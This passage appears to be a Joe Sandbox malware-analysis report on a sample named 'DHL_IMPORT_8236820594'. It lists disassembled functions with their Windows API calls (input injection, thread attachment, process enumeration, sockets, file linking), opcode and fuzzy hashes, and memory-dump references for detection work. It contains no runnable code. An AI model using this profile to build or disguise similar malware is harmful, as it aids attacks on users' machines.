Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 455e837bb71bdd8efa318c9556c1907d507a4e2951bb9c67ad2c68f8848f7d26
Instruction ID: 45f29743536492d82d4fb25dbc922bca5fb13c568a2ee8d88c303b5ce26be71d
Opcode Fuzzy Hash: 455e837bb71bdd8efa318c9556c1907d507a4e2951bb9c67ad2c68f8848f7d26
Instruction Fuzzy Hash: 0211E331240248BEEF209E29DC06FAB3BACFF95B54F114518FA59E6090D271DC61AB14

Function 00542F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004E6B57: _wcslen.LIBCMT ref: 004E6B6A

Part of subcall function 00542DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00542DC5
Part of subcall function 00542DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00542DD6
Part of subcall function 00542DA7: GetCurrentThreadId.KERNEL32 ref: 00542DDD
Part of subcall function 00542DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00542DE4

GetFocus.USER32 ref: 00542F78

Part of subcall function 00542DEE: GetParent.USER32(00000000), ref: 00542DF9

GetClassNameW.USER32(?,?,00000100), ref: 00542FC3
EnumChildWindows.USER32(?,0054303B), ref: 00542FEB

Strings

%s%d, xrefs: 00542FFF

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: 15865ffe60061048d77cc334767c7972ac00c0167713bb4131c25c0b05dac37f
Instruction ID: b964d83ce46284ba9c8033d870ba3bbfb171ca01f0add359cededbba88f6d6c8
Opcode Fuzzy Hash: 15865ffe60061048d77cc334767c7972ac00c0167713bb4131c25c0b05dac37f
Instruction Fuzzy Hash: 1F11D2716002156BCF04BF659C89EED3FAABF94308F044079B90D9B152DE30A94A9B60

Function 00575882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 005758C1
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 005758EE
DrawMenuBar.USER32(?), ref: 005758FD

Strings

0, xrefs: 0057588F

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: a37a4706eb9d4efcf8e6427c8d8653662f8dece2c14f532e1ac8f9b26dea12fb
Instruction ID: e5e8673d25f7a870d2d17d56d8ba72326c4aca129b128ef5148522436e6f3c9e
Opcode Fuzzy Hash: a37a4706eb9d4efcf8e6427c8d8653662f8dece2c14f532e1ac8f9b26dea12fb
Instruction Fuzzy Hash: 24013931500218EFDB219F11E844BAABFB5BF45360F10809AE94DD6151EB718A88EF21

Function 0053D3A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0053D3BF
FreeLibrary.KERNEL32 ref: 0053D3E5

Strings

GetSystemWow64DirectoryW, xrefs: 0053D3B9
X64, xrefs: 0053D2A8

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 3013587201-2590602151
Opcode ID: 3e4805fe68a77b3337332f040034008d012d7799ba82732e0cf2f0b80a0ea86c
Instruction ID: 742622e6d1c1f3cc6c3706128dc63be2d8f2cbe01e0f3e7bfa3af43cafb1c0e4
Opcode Fuzzy Hash: 3e4805fe68a77b3337332f040034008d012d7799ba82732e0cf2f0b80a0ea86c
Instruction Fuzzy Hash: 8DF05C659016149BD7B106107C1896F3F74BF10701FD48C2DF506E6104DB20CD84D6B6

Function 0054007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b14b4caadecf8cb43e43b4a3a19a361aaf0b8326a2106a9bcf050f5fc467d245
Instruction ID: 7cc9dcdf7d087b3e8e8c1ec7721b842fb05fb1c30da8f51643a5f45dac54090c
Opcode Fuzzy Hash: b14b4caadecf8cb43e43b4a3a19a361aaf0b8326a2106a9bcf050f5fc467d245
Instruction Fuzzy Hash: 1EC17F75A00206EFCB14CF94C894EAEBBB5FF48318F209598E505EB291D771ED41DB90

Function 0056342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00563459
CoUninitialize.OLE32 ref: 00563463
VariantInit.OLEAUT32(?), ref: 0056346E
VariantClear.OLEAUT32(?), ref: 0056371B

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Variant$ClearInitInitializeUninitialize
String ID:
API String ID: 1998397398-0
Opcode ID: a88a2bad6a5aef9e435a146cdf4c99655900b2d30e774ee04bf74b32fe9ccf0f
Instruction ID: 4b017eebbac54827d4c17458d9e23336ff903a8e489bc31b3ecc51c508a32d6c
Opcode Fuzzy Hash: a88a2bad6a5aef9e435a146cdf4c99655900b2d30e774ee04bf74b32fe9ccf0f
Instruction Fuzzy Hash: 68A17075204700AFC700DF25C485A2ABBE5FF88769F04895EF98A9B362DB34EE05CB55

Function 00540436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0057FC08,?), ref: 005405F0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0057FC08,?), ref: 00540608
CLSIDFromProgID.OLE32(?,?,00000000,0057CC40,000000FF,?,00000000,00000800,00000000,?,0057FC08,?), ref: 0054062D
_memcmp.LIBVCRUNTIME ref: 0054064E

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: a6eb6d0dd83046518b64eef1bba78cc788dd1a588a4164f29bf710ebb4abc24f
Instruction ID: 436e976a1b68fae010e25343a38cda48706510b975d32357e6f89fffab766e2c
Opcode Fuzzy Hash: a6eb6d0dd83046518b64eef1bba78cc788dd1a588a4164f29bf710ebb4abc24f
Instruction Fuzzy Hash: EB810075900109EFCB04DF94C984DEEBBB9FF89319F204558E606AB290DB71AE46CF60

Function 00521391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 005214C0

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 53ee3e838ebe66b0f30fe2f5283e24fe6c4d9d1012603e628164bb23e3aab0fa
Instruction ID: 87e6d063220cf8eb02ab475147c5d3f376c796a80b750d1478e5d3bdb0830808
Opcode Fuzzy Hash: 53ee3e838ebe66b0f30fe2f5283e24fe6c4d9d1012603e628164bb23e3aab0fa
Instruction Fuzzy Hash: 28412935A00D22AAEF217AB8AC496AF3EA4FFA3330F144625F41D961D2E674488157A5

Function 00576278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00C2EB40,?), ref: 005762E2
ScreenToClient.USER32(?,?), ref: 00576315
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00576382

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: fd2e85fc3cb35fe8d8fc03561b7db0a5372572dad0eb677b98a656ebaaf9c1c7
Instruction ID: 4db5038815729b700bd0f6914d6da14952a9dfd4cc48576c15e3d2e678372e13
Opcode Fuzzy Hash: fd2e85fc3cb35fe8d8fc03561b7db0a5372572dad0eb677b98a656ebaaf9c1c7
Instruction Fuzzy Hash: 7D512C74A00649EFDF10DF68E8809AE7BB6FF55364F108659F8199B290D730ED81EB90

Function 00561AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00561AFD
WSAGetLastError.WSOCK32 ref: 00561B0B
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00561B8A
WSAGetLastError.WSOCK32 ref: 00561B94

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: 847ebc81a7554628752eb2121745b730d21a480c65842a8763295d72b7e42d70
Instruction ID: 0fe4f7a12fe658adf5f53d40684c1b24ef56b44f6104f40935c5bd4da7cfe05b
Opcode Fuzzy Hash: 847ebc81a7554628752eb2121745b730d21a480c65842a8763295d72b7e42d70
Instruction Fuzzy Hash: D241C2346006006FE720AF25D886F397BE5AB44718F58848DFA1A9F3D3D776ED418B94

Function 0051B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 957d74fd31e15aecd12d58418180eb2dbcbdde048328666d5faca35dd7c27018
Instruction ID: aaeb690d4b77b5a715fa9b54163b561e56a975f0c5092cff47af843e93a4d54f
Opcode Fuzzy Hash: 957d74fd31e15aecd12d58418180eb2dbcbdde048328666d5faca35dd7c27018
Instruction Fuzzy Hash: 5641F675A00615AFF7249F38CC45BAA7FAAFB88710F10852EF501DB681D3B199818780

Function 005556D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00555783
GetLastError.KERNEL32(?,00000000), ref: 005557A9
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 005557CE
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 005557FA

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: de8adfc398a4d60aaa895006c254fd9397671a1ad5ce94cf91cc909733ad7009
Instruction ID: 153ea0064f5eec6258c95d6fdb67d38fc6786e7a63e563bb68ae5d1fd04f27ef
Opcode Fuzzy Hash: de8adfc398a4d60aaa895006c254fd9397671a1ad5ce94cf91cc909733ad7009
Instruction Fuzzy Hash: C9415C39200A10DFCB10DF16C454A1EBBE1FF88369B188889EC4A5B362DB34FD44DB95

Function 0051D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,00506D71,00000000,00000000,005082D9,?,005082D9,?,00000001,00506D71,?,00000001,005082D9,005082D9), ref: 0051D910
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0051D999
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0051D9AB
__freea.LIBCMT ref: 0051D9B4

Part of subcall function 00513820: RtlAllocateHeap.NTDLL(00000000,?,005B1444,?,004FFDF5,?,?,004EA976,00000010,005B1440,004E13FC,?,004E13C6,?,004E1129), ref: 00513852

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 51552bab0618d62dc9fe39f7711c410fe80863b640c868c2870aadb5844db11d
Instruction ID: f4cead7d7cdd5e5224b6534e8428a18e686ffbe5f997792e99516a2a40d214f8
Opcode Fuzzy Hash: 51552bab0618d62dc9fe39f7711c410fe80863b640c868c2870aadb5844db11d
Instruction Fuzzy Hash: F0319A72A0020AABEB249F64DC85EEE7FB5FB41350F054168FC0896290EB35DD94DBA0

Function 005752C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001024,00000000,?), ref: 00575352
GetWindowLongW.USER32(?,000000F0), ref: 00575375
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00575382
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 005753A8

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: LongWindow$InvalidateMessageRectSend
String ID:
API String ID: 3340791633-0
Opcode ID: da95d52b6ed7d7d4ab809bc1e432feb3dcd208bec16fa0af8dec5f09304da58f
Instruction ID: 7e4585b8ec7482088cc861d3f794acbf76da9c5e8f901b39e37a4ccd0f4d67e1
Opcode Fuzzy Hash: da95d52b6ed7d7d4ab809bc1e432feb3dcd208bec16fa0af8dec5f09304da58f
Instruction Fuzzy Hash: B131D430A55A08EFEB309E14EC55FE83F65BB04390F988905FA19961F0E7F4AD80B741

Function 0054AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 0054ABF1
SetKeyboardState.USER32(00000080,?,00008000), ref: 0054AC0D
PostMessageW.USER32(00000000,00000101,00000000), ref: 0054AC74
SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 0054ACC6

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 6a3a86b50024f00fa2a31a01c9d73ccb1b99602fade27589e4111878dc62aac7
Instruction ID: f701c43b784afc2c086252c455f77bb278fea20850f84f87a52c82df7949c8ae
Opcode Fuzzy Hash: 6a3a86b50024f00fa2a31a01c9d73ccb1b99602fade27589e4111878dc62aac7
Instruction Fuzzy Hash: 28314670A80219AFFFB5CB648C89BFA7FA5BB88318F04461AF484971D0C3748D859792

Function 00577674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0057769A
GetWindowRect.USER32(?,?), ref: 00577710
PtInRect.USER32(?,?,00578B89), ref: 00577720
MessageBeep.USER32(00000000), ref: 0057778C

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 6f6bfbc09d3129a6e0b63599cf545c2d47c4b36488333f27acf3b099f02c41ad
Instruction ID: 9f65974ea0cae304b7fb799a8be2df49602c57c0d8509a2f3b3d8b32c9f9bd4c
Opcode Fuzzy Hash: 6f6bfbc09d3129a6e0b63599cf545c2d47c4b36488333f27acf3b099f02c41ad
Instruction Fuzzy Hash: 80419A34A05659AFCB05CF59F894EA9BBF5FB5C304F1481A8E8189F261C330AA45EF90

Function 005716DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 005716EB

Part of subcall function 00543A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00543A57
Part of subcall function 00543A3D: GetCurrentThreadId.KERNEL32 ref: 00543A5E
Part of subcall function 00543A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,005425B3), ref: 00543A65

GetCaretPos.USER32(?), ref: 005716FF
ClientToScreen.USER32(00000000,?), ref: 0057174C
GetForegroundWindow.USER32 ref: 00571752

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: cf015a89bbf2613bdd94c67cfd8126b0d165ae95e6ac54cd567df4d6fc8e9a10
Instruction ID: affd199862e9a98b4938a9f9f90708e73b7d4c5dbe439abfae6f01fdf42c4a33
Opcode Fuzzy Hash: cf015a89bbf2613bdd94c67cfd8126b0d165ae95e6ac54cd567df4d6fc8e9a10
Instruction Fuzzy Hash: F7316171D00149AFCB04DFAAD881CAEBBF9FF48308B5080AEE415E7251D7359E45CBA0

Function 0054D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0054D501
Process32FirstW.KERNEL32(00000000,?), ref: 0054D50F
Process32NextW.KERNEL32(00000000,?), ref: 0054D52F
CloseHandle.KERNEL32(00000000), ref: 0054D5DC

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 87707b407ac6c6520f4792ef1710fdf942d77fec789948943e51a2ca7dd21261
Instruction ID: 5ee242dc13c10c4d804abb267d8e46d7ad9a11dae3c6238781cf197b12905265
Opcode Fuzzy Hash: 87707b407ac6c6520f4792ef1710fdf942d77fec789948943e51a2ca7dd21261
Instruction Fuzzy Hash: BE31B1711083409FD300EF55D885AAFBFF8FF99348F54092DF585821A1EB719988DBA2

Function 00578FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 004F9BB2

GetCursorPos.USER32(?), ref: 00579001
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00537711,?,?,?,?,?), ref: 00579016
GetCursorPos.USER32(?), ref: 0057905E
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00537711,?,?,?), ref: 00579094

Memory Dump Source

